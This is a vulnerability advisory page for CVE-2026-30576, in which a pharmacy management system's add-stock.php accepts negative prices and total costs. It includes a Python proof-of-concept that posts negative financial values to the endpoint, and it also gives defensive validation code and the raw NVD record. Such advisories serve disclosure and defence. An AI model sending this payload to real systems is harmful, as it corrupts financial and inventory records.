Security Vulnerability Report
CVE-2026-30576 CVSS 7.5 HIGH

CVE-2026-30576

Published: 2026-03-27 17:16:29
Last Modified: 2026-03-31 16:14:40

Description

A Business Logic vulnerability exists in SourceCodester Pharmacy Product Management System 1.0 in the add-stock.php file. The application fails to validate the "txtprice" and "txttotalcost" parameters during stock entry, allowing negative financial values to be submitted. This leads to corruption of financial records, allowing attackers to manipulate inventory asset values and procurement costs.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:senior-walter:web-based_pharmacy_product_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Pharmacy Product Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_negative_price(target_url):
    """
    PoC for CVE-2026-30576: Business Logic Vulnerability in Pharmacy Product Management System.
    Demonstrates submitting negative values for price and total cost.
    """
    # The endpoint responsible for adding stock
    endpoint = "/add-stock.php"
    full_url = f"{target_url}{endpoint}"

    # Payload containing negative financial values
    data_payload = {
        "txtproduct": "1",          # Valid Product ID
        "txtqty": "10",             # Valid Quantity
        "txtprice": "-500.00",      # Malicious: Negative Price
        "txttotalcost": "-5000.00"  # Malicious: Negative Total Cost
    }

    try:
        # Sending the POST request to the vulnerable application
        response = requests.post(full_url, data=data_payload)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check the database/financial records to verify if negative values were accepted.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost/pharmacy"
    exploit_negative_price(target)
```
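As an added defensive example, not code from the advisory or from the SourceCodester application, the following Python models the server-side validation that add-stock.php lacks: it takes the same form fields the PoC submits and rejects negative, zero, non-numeric or inconsistent financial values. The field names come from the advisory; the upper bounds and the rule that txttotalcost must equal txtqty * txtprice are assumptions for illustration.

```python
from decimal import Decimal, InvalidOperation

MAX_QTY = 1_000_000                  # assumed bound for illustration
MAX_PRICE = Decimal("1000000.00")    # assumed bound, not from the application

class StockEntryError(ValueError):
    """Raised when a stock-entry submission fails validation."""

def _parse_money(field, raw):
    """Parse a monetary form field: must be finite, > 0, at most two decimals."""
    try:
        value = Decimal(raw)
    except (InvalidOperation, TypeError, ValueError):
        raise StockEntryError(f"{field}: not a number")
    if not value.is_finite() or value <= 0 or value > MAX_PRICE:
        raise StockEntryError(f"{field}: must be > 0 and <= {MAX_PRICE}")
    if value != value.quantize(Decimal("0.01")):
        raise StockEntryError(f"{field}: at most two decimal places")
    return value

def validate_stock_entry(form):
    """Validate the add-stock form fields and return the values to store.
    Rejects negative or zero financial values (the CVE-2026-30576 condition) and
    requires txttotalcost == txtqty * txtprice, so the total cannot be set freely.
    """
    try:
        product_id = int(form.get("txtproduct", ""))
        qty = int(form.get("txtqty", ""))
    except (TypeError, ValueError):
        raise StockEntryError("txtproduct/txtqty: must be integers")
    if product_id <= 0 or not 0 < qty <= MAX_QTY:
        raise StockEntryError("txtproduct/txtqty: out of range")
    price = _parse_money("txtprice", form.get("txtprice"))
    total = _parse_money("txttotalcost", form.get("txttotalcost"))
    if total != price * qty:
        raise StockEntryError("txttotalcost: does not equal txtqty * txtprice")
    return {"product_id": product_id, "qty": qty, "price": price, "total": total}

def is_accepted(form):
    """True if the submission passes validation and would be stored."""
    try:
        validate_stock_entry(form)
        return True
    except StockEntryError:
        return False

# Constructed samples: the PoC's negative payload and a well-formed entry.
POC_PAYLOAD = {"txtproduct": "1", "txtqty": "10", "txtprice": "-500.00", "txttotalcost": "-5000.00"}
VALID_ENTRY = {"txtproduct": "1", "txtqty": "10", "txtprice": "500.00", "txttotalcost": "5000.00"}
```

Using Decimal rather than float keeps the comparison exact, so a total that differs from qty * price by a fraction of a cent is also rejected.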

References

https://github.com/meifukun/Web-Security-PoCs/blob/main/Pharmacy-Product-Management-System/Logic-AddStock-NegativePrice.md (Exploit, Third Party Advisory)

Weakness: CWE-20 (Improper Input Validation)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-30576", "sourceIdentifier": "[email protected]", "published": "2026-03-27T17:16:29.057", "lastModified": "2026-03-31T16:14:39.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Business Logic vulnerability exists in SourceCodester Pharmacy Product Management System 1.0 in the add-stock.php file. The application fails to validate the \"txtprice\" and \"txttotalcost\" parameters during stock entry, allowing negative financial values to be submitted. This leads to corruption of financial records, allowing attackers to manipulate inventory asset values and procurement costs."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:senior-walter:web-based_pharmacy_product_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DB2DA030-DE10-4DA9-86D7-3E3E9A22DABC"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Pharmacy-Product-Management-System/Logic-AddStock-NegativePrice.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
```